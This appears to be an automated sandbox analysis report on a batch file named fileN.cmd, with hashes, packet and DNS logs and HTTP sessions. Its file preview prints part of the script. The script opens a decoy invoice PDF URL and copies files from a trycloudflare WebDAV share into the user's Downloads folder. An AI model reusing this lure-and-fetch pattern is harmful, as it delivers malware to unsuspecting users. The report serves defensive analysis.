                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                URL:https://s2r.tn/favicon.ico
                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):315
                                                Entropy (8bit):5.0572271090563765
                                                Encrypted:false
                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                URL:https://s2r.tn/cgi/INVOICERVSHA.pdf
                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                File type:DOS batch file, ASCII text, with CRLF line terminators
                                                Entropy (8bit):5.055753899661047
                                                TrID:
                                                  File name:fileN.cmd
                                                  File size:2'029 bytes
                                                  MD5:b0440336a17e2a86c8fdaab419c3a3f7
                                                  SHA1:f831b05ff3fc56c2e023e4121e07b895fe1d9153
                                                  SHA256:7d5848842e934d5a57fb8766962a556e01c3715481d63d2a10dbca4bac897ddf
                                                  SHA512:98d631901af6b240356c6443ba3c7a20af35034189f38caedd87790a034bedadf784aa034a77438d14574193eb5037c3778a5c05201bfe1380d62c56efd66f27
                                                  SSDEEP:48:7Zc2Nq7rGuszsES/dasE1TmJn4JWsEd9BjNRJ412QsEIpSY4c:mLjZESFHE1e4ZEd9BZRe01EIIlc
                                                  TLSH:7D41F4C2354E403C92B0AB32BE308997D566608EB344A915B0F6C4ED0F665D85AFE7E5
                                                  File Content Preview:@echo off..setlocal....set source=\\maintenance-princess-musical-vocational.trycloudflare.com@SSL\DavWWWRoot\google\Win..set destination=%USERPROFILE%\Downloads....echo Opening PDF file.....start "" "https://s2r.tn/cgi/INVOICERVSHA.pdf"....copy /Y "%sourc
                                                  Icon Hash:9686878b929a9886
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 23, 2024 21:06:44.864469051 CEST49674443192.168.2.6173.222.162.64
                                                  May 23, 2024 21:06:44.864521027 CEST49673443192.168.2.6173.222.162.64
                                                  May 23, 2024 21:06:45.176999092 CEST49672443192.168.2.6173.222.162.64
                                                  May 23, 2024 21:06:50.196844101 CEST49704443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.196902037 CEST4434970470.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.198009014 CEST49705443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.198009014 CEST49704443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.198009014 CEST49704443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.198019981 CEST4434970570.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.198065996 CEST4434970470.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.198106050 CEST49705443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.198499918 CEST49705443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.198512077 CEST4434970570.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.734395027 CEST4434970470.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.734668016 CEST49704443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.734687090 CEST4434970470.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.735738993 CEST4434970470.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.736166000 CEST49704443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.736201048 CEST4434970570.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.737061024 CEST49705443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.737061024 CEST49704443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.737061024 CEST49704443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.737071991 CEST4434970570.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.737092972 CEST4434970470.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.737162113 CEST4434970470.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.738116026 CEST4434970570.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.738735914 CEST49705443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.741008043 CEST49705443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.741094112 CEST4434970570.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.786214113 CEST49704443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.786214113 CEST49705443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.786237001 CEST4434970470.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.786252022 CEST4434970570.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.833441973 CEST49705443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.833484888 CEST49704443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.917114973 CEST4434970470.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.917335033 CEST4434970470.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:50.917659998 CEST49704443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.920131922 CEST49704443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:50.920149088 CEST4434970470.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.039525032 CEST49705443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:51.086503029 CEST4434970570.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.157855034 CEST4434970570.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.157963037 CEST4434970570.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.158107996 CEST49705443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:51.167824984 CEST49705443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:51.167850018 CEST4434970570.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.182503939 CEST49707443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:51.182538986 CEST4434970770.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.182837009 CEST49707443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:51.182837009 CEST49707443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:51.182867050 CEST4434970770.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.730792046 CEST4434970770.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.731230021 CEST49707443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:51.731252909 CEST4434970770.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.731597900 CEST4434970770.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.732057095 CEST49707443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:51.732117891 CEST4434970770.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.732300997 CEST49707443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:51.778539896 CEST4434970770.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.931917906 CEST4434970770.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.931994915 CEST4434970770.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:51.932051897 CEST49707443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:51.933093071 CEST49707443192.168.2.670.38.21.234
                                                  May 23, 2024 21:06:51.933109999 CEST4434970770.38.21.234192.168.2.6
                                                  May 23, 2024 21:06:54.033612013 CEST49710443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:06:54.033651114 CEST44349710216.58.212.132192.168.2.6
                                                  May 23, 2024 21:06:54.033754110 CEST49710443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:06:54.033947945 CEST49710443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:06:54.033958912 CEST44349710216.58.212.132192.168.2.6
                                                  May 23, 2024 21:06:54.322164059 CEST49711443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:54.322205067 CEST44349711184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:54.322261095 CEST49711443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:54.327789068 CEST49711443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:54.327805996 CEST44349711184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:54.472392082 CEST49673443192.168.2.6173.222.162.64
                                                  May 23, 2024 21:06:54.472553015 CEST49674443192.168.2.6173.222.162.64
                                                  May 23, 2024 21:06:54.722141027 CEST44349710216.58.212.132192.168.2.6
                                                  May 23, 2024 21:06:54.722440004 CEST49710443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:06:54.722466946 CEST44349710216.58.212.132192.168.2.6
                                                  May 23, 2024 21:06:54.723447084 CEST44349710216.58.212.132192.168.2.6
                                                  May 23, 2024 21:06:54.723531961 CEST49710443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:06:54.724839926 CEST49710443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:06:54.724912882 CEST44349710216.58.212.132192.168.2.6
                                                  May 23, 2024 21:06:54.769747019 CEST49710443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:06:54.769764900 CEST44349710216.58.212.132192.168.2.6
                                                  May 23, 2024 21:06:54.786144018 CEST49672443192.168.2.6173.222.162.64
                                                  May 23, 2024 21:06:54.831406116 CEST49710443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:06:54.989007950 CEST44349711184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:54.989099979 CEST49711443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:54.996396065 CEST49711443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:54.996431112 CEST44349711184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:54.996794939 CEST44349711184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:55.049631119 CEST49711443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:55.094497919 CEST44349711184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:55.305258989 CEST44349711184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:55.305335045 CEST44349711184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:55.305412054 CEST49711443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:55.307682037 CEST49711443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:55.307703972 CEST44349711184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:55.307718039 CEST49711443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:55.307723999 CEST44349711184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:55.348104954 CEST49712443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:55.348146915 CEST44349712184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:55.348229885 CEST49712443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:55.348548889 CEST49712443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:55.348563910 CEST44349712184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:56.032040119 CEST44349712184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:56.032139063 CEST49712443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:56.033763885 CEST49712443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:56.033771992 CEST44349712184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:56.034063101 CEST44349712184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:56.037966967 CEST49712443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:56.078496933 CEST44349712184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:56.360008955 CEST44349712184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:56.360199928 CEST44349712184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:56.360261917 CEST49712443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:56.366257906 CEST49712443192.168.2.6184.28.90.27
                                                  May 23, 2024 21:06:56.366290092 CEST44349712184.28.90.27192.168.2.6
                                                  May 23, 2024 21:06:56.534126997 CEST44349698173.222.162.64192.168.2.6
                                                  May 23, 2024 21:06:56.539480925 CEST49698443192.168.2.6173.222.162.64
                                                  May 23, 2024 21:07:04.619925976 CEST44349710216.58.212.132192.168.2.6
                                                  May 23, 2024 21:07:04.620075941 CEST44349710216.58.212.132192.168.2.6
                                                  May 23, 2024 21:07:04.620254040 CEST49710443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:07:06.088428974 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:06.088469982 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:06.088547945 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:06.090106010 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:06.090122938 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:06.130872965 CEST49710443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:07:06.130903006 CEST44349710216.58.212.132192.168.2.6
                                                  May 23, 2024 21:07:06.976500034 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:06.976586103 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:06.980107069 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:06.980119944 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:06.980385065 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:07.035114050 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:07.592914104 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:07.638506889 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:07.866928101 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:07.866955996 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:07.866962910 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:07.866977930 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:07.866986990 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:07.866995096 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:07.867063999 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:07.867088079 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:07.867141962 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:07.881252050 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:07.881330967 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:07.881340027 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:07.881403923 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:08.443254948 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:08.443283081 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:08.443698883 CEST49714443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:08.443707943 CEST4434971420.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:44.889040947 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:44.889086008 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:44.889266014 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:44.889583111 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:44.889600039 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:45.800440073 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:45.800626993 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:45.805188894 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:45.805196047 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:45.805403948 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:45.814505100 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:45.862488985 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:46.188422918 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:46.188445091 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:46.188509941 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:46.188535929 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:46.188555002 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:46.188585997 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:46.188608885 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:46.206085920 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:46.206140041 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:46.206181049 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:46.206193924 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:46.206268072 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:46.206430912 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:46.206445932 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:46.206458092 CEST49720443192.168.2.620.114.59.183
                                                  May 23, 2024 21:07:46.206464052 CEST4434972020.114.59.183192.168.2.6
                                                  May 23, 2024 21:07:54.086699963 CEST49722443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:07:54.086755037 CEST44349722216.58.212.132192.168.2.6
                                                  May 23, 2024 21:07:54.086829901 CEST49722443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:07:54.087100029 CEST49722443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:07:54.087112904 CEST44349722216.58.212.132192.168.2.6
                                                  May 23, 2024 21:07:54.772095919 CEST44349722216.58.212.132192.168.2.6
                                                  May 23, 2024 21:07:54.772486925 CEST49722443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:07:54.772511959 CEST44349722216.58.212.132192.168.2.6
                                                  May 23, 2024 21:07:54.773000002 CEST44349722216.58.212.132192.168.2.6
                                                  May 23, 2024 21:07:54.773376942 CEST49722443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:07:54.773438931 CEST44349722216.58.212.132192.168.2.6
                                                  May 23, 2024 21:07:54.819576025 CEST49722443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:08:04.690757990 CEST44349722216.58.212.132192.168.2.6
                                                  May 23, 2024 21:08:04.690849066 CEST44349722216.58.212.132192.168.2.6
                                                  May 23, 2024 21:08:04.690917969 CEST49722443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:08:06.135876894 CEST49722443192.168.2.6216.58.212.132
                                                  May 23, 2024 21:08:06.135912895 CEST44349722216.58.212.132192.168.2.6
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 23, 2024 21:06:49.914915085 CEST5178353192.168.2.61.1.1.1
                                                  May 23, 2024 21:06:49.915049076 CEST5733653192.168.2.61.1.1.1
                                                  May 23, 2024 21:06:49.932502985 CEST53553681.1.1.1192.168.2.6
                                                  May 23, 2024 21:06:49.989629984 CEST53610331.1.1.1192.168.2.6
                                                  May 23, 2024 21:06:50.146300077 CEST53517831.1.1.1192.168.2.6
                                                  May 23, 2024 21:06:51.237035036 CEST53514071.1.1.1192.168.2.6
                                                  May 23, 2024 21:06:51.683116913 CEST53573361.1.1.1192.168.2.6
                                                  May 23, 2024 21:06:54.020451069 CEST5774553192.168.2.61.1.1.1
                                                  May 23, 2024 21:06:54.020580053 CEST6347853192.168.2.61.1.1.1
                                                  May 23, 2024 21:06:54.027698040 CEST53577451.1.1.1192.168.2.6
                                                  May 23, 2024 21:06:54.032897949 CEST53634781.1.1.1192.168.2.6
                                                  May 23, 2024 21:07:09.744452000 CEST53617041.1.1.1192.168.2.6
                                                  May 23, 2024 21:07:28.604208946 CEST53539791.1.1.1192.168.2.6
                                                  May 23, 2024 21:07:49.315962076 CEST53586911.1.1.1192.168.2.6
                                                  May 23, 2024 21:07:51.735074043 CEST53550401.1.1.1192.168.2.6
                                                  May 23, 2024 21:08:17.905232906 CEST53515361.1.1.1192.168.2.6
                                                  TimestampSource IPDest IPChecksumCodeType
                                                  May 23, 2024 21:06:51.683187962 CEST192.168.2.61.1.1.1c21d(Port unreachable)Destination Unreachable
                                                  May 23, 2024 21:08:19.039011002 CEST192.168.2.61.1.1.1c235(Port unreachable)Destination Unreachable
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  May 23, 2024 21:06:49.914915085 CEST192.168.2.61.1.1.10x9236Standard query (0)s2r.tnA (IP address)IN (0x0001)false
                                                  May 23, 2024 21:06:49.915049076 CEST192.168.2.61.1.1.10x2d7cStandard query (0)s2r.tn65IN (0x0001)false
                                                  May 23, 2024 21:06:54.020451069 CEST192.168.2.61.1.1.10x12e9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                  May 23, 2024 21:06:54.020580053 CEST192.168.2.61.1.1.10xe9a6Standard query (0)www.google.com65IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  May 23, 2024 21:06:50.146300077 CEST1.1.1.1192.168.2.60x9236No error (0)s2r.tn70.38.21.234A (IP address)IN (0x0001)false
                                                  May 23, 2024 21:06:54.027698040 CEST1.1.1.1192.168.2.60x12e9No error (0)www.google.com216.58.212.132A (IP address)IN (0x0001)false
                                                  May 23, 2024 21:06:54.032897949 CEST1.1.1.1192.168.2.60xe9a6No error (0)www.google.com65IN (0x0001)false
                                                  • s2r.tn
                                                  • https:
                                                  • fs.microsoft.com
                                                  • slscr.update.microsoft.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.64970470.38.21.2344434092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:06:50 UTC669OUTGET /cgi/INVOICERVSHA.pdf HTTP/1.1
                                                  Host: s2r.tn
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-User: ?1
                                                  Sec-Fetch-Dest: document
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-05-23 19:06:50 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 23 May 2024 19:06:50 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-05-23 19:06:50 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.64970570.38.21.2344434092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:06:51 UTC588OUTGET /favicon.ico HTTP/1.1
                                                  Host: s2r.tn
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://s2r.tn/cgi/INVOICERVSHA.pdf
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-05-23 19:06:51 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 23 May 2024 19:06:51 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-05-23 19:06:51 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.64970770.38.21.2344434092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:06:51 UTC341OUTGET /cgi/INVOICERVSHA.pdf HTTP/1.1
                                                  Host: s2r.tn
                                                  Connection: keep-alive
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-Dest: empty
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
